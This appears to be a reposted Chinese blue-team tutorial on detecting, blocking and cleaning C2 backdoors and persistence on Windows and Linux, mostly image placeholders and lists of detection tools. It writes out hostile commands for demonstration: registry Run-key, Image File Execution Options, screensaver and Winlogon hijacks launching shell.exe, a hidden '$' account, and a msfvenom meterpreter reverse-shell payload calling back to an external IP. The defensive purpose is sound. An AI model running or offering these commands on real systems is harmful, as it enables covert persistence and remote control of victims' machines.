蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理

本文主要是介绍蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

知识点

1、应急响应-C2后门-排查&封锁
2、应急响应-权限维持-排查&清理
3、应急响应-基线检测-整改&排查

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows

1、常规C2后门-分析检测

无隐匿手法

在这里插入图片描述
也可以把怀疑的exe程序上传到沙箱上分析
在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

清除:删除文件

封锁:防火墙都有出入站规则,需要自己判断在哪里设置封锁策略
1、防火墙阻止程序
(一般没啥用,变个文件名就不行了)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
2、防火墙阻止网络链接-IP
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、权限维持技术-分析检测

自启动测试

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor

在这里插入图片描述
在这里插入图片描述

隐藏账户

net user xiaodi$ xiaodi!@#X123 /add

在这里插入图片描述
可以使用PCHunter工具查看当前系统用户
在这里插入图片描述
或者

运行-lusrmgr.msc-本地用户和组-用户

在这里插入图片描述

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"

在这里插入图片描述
可以使用PCHunter或者火绒剑工具查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe

在这里插入图片描述
在这里插入图片描述

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

5、基线检测配合分析项目

Golin

WindowsBaselineAssistant

在这里插入图片描述

d-eyes

在这里插入图片描述
在这里插入图片描述

FindAll

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Linux

1、常规C2后门-分析检测

无隐匿手法

常规后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
netstat -anpt

在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

删除文件,防火墙阻止程序或IP域名等

2、权限维持技术-分析检测

GScan

Golin

d-eyes

在这里插入图片描述

Whoamifuck

Ashro_linux

linuxcheckshoot

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

这篇关于蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1092285

相关文章

一文详解SpringBoot响应压缩功能的配置与优化

《一文详解SpringBoot响应压缩功能的配置与优化》SpringBoot的响应压缩功能基于智能协商机制,需同时满足很多条件,本文主要为大家详细介绍了SpringBoot响应压缩功能的配置与优化,需... 目录一、核心工作机制1.1 自动协商触发条件1.2 压缩处理流程二、配置方案详解2.1 基础YAML

SpringBoot启动报错的11个高频问题排查与解决终极指南

《SpringBoot启动报错的11个高频问题排查与解决终极指南》这篇文章主要为大家详细介绍了SpringBoot启动报错的11个高频问题的排查与解决,文中的示例代码讲解详细,感兴趣的小伙伴可以了解一... 目录1. 依赖冲突:NoSuchMethodError 的终极解法2. Bean注入失败:No qu

如何解决Spring MVC中响应乱码问题

《如何解决SpringMVC中响应乱码问题》:本文主要介绍如何解决SpringMVC中响应乱码问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Spring MVC最新响应中乱码解决方式以前的解决办法这是比较通用的一种方法总结Spring MVC最新响应中乱码解

Java程序运行时出现乱码问题的排查与解决方法

《Java程序运行时出现乱码问题的排查与解决方法》本文主要介绍了Java程序运行时出现乱码问题的排查与解决方法,包括检查Java源文件编码、检查编译时的编码设置、检查运行时的编码设置、检查命令提示符的... 目录一、检查 Java 源文件编码二、检查编译时的编码设置三、检查运行时的编码设置四、检查命令提示符

SpringSecurity 认证、注销、权限控制功能(注销、记住密码、自定义登入页)

《SpringSecurity认证、注销、权限控制功能(注销、记住密码、自定义登入页)》SpringSecurity是一个强大的Java框架,用于保护应用程序的安全性,它提供了一套全面的安全解决方案... 目录简介认识Spring Security“认证”(Authentication)“授权” (Auth

Spring Security注解方式权限控制过程

《SpringSecurity注解方式权限控制过程》:本文主要介绍SpringSecurity注解方式权限控制过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、摘要二、实现步骤2.1 在配置类中添加权限注解的支持2.2 创建Controller类2.3 Us

Redis实现RBAC权限管理

《Redis实现RBAC权限管理》本文主要介绍了Redis实现RBAC权限管理,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录1. 什么是 RBAC?2. 为什么使用 Redis 实现 RBAC?3. 设计 RBAC 数据结构

Vue中动态权限到按钮的完整实现方案详解

《Vue中动态权限到按钮的完整实现方案详解》这篇文章主要为大家详细介绍了Vue如何在现有方案的基础上加入对路由的增、删、改、查权限控制,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、数据库设计扩展1.1 修改路由表(routes)1.2 修改角色与路由权限表(role_routes)二、后端接口设计

springMVC返回Http响应的实现

《springMVC返回Http响应的实现》本文主要介绍了在SpringBoot中使用@Controller、@ResponseBody和@RestController注解进行HTTP响应返回的方法,... 目录一、返回页面二、@Controller和@ResponseBody与RestController

Rust中的Drop特性之解读自动化资源清理的魔法

《Rust中的Drop特性之解读自动化资源清理的魔法》Rust通过Drop特性实现了自动清理机制,确保资源在对象超出作用域时自动释放,避免了手动管理资源时可能出现的内存泄漏或双重释放问题,智能指针如B... 目录自动清理机制:Rust 的析构函数提前释放资源:std::mem::drop android的妙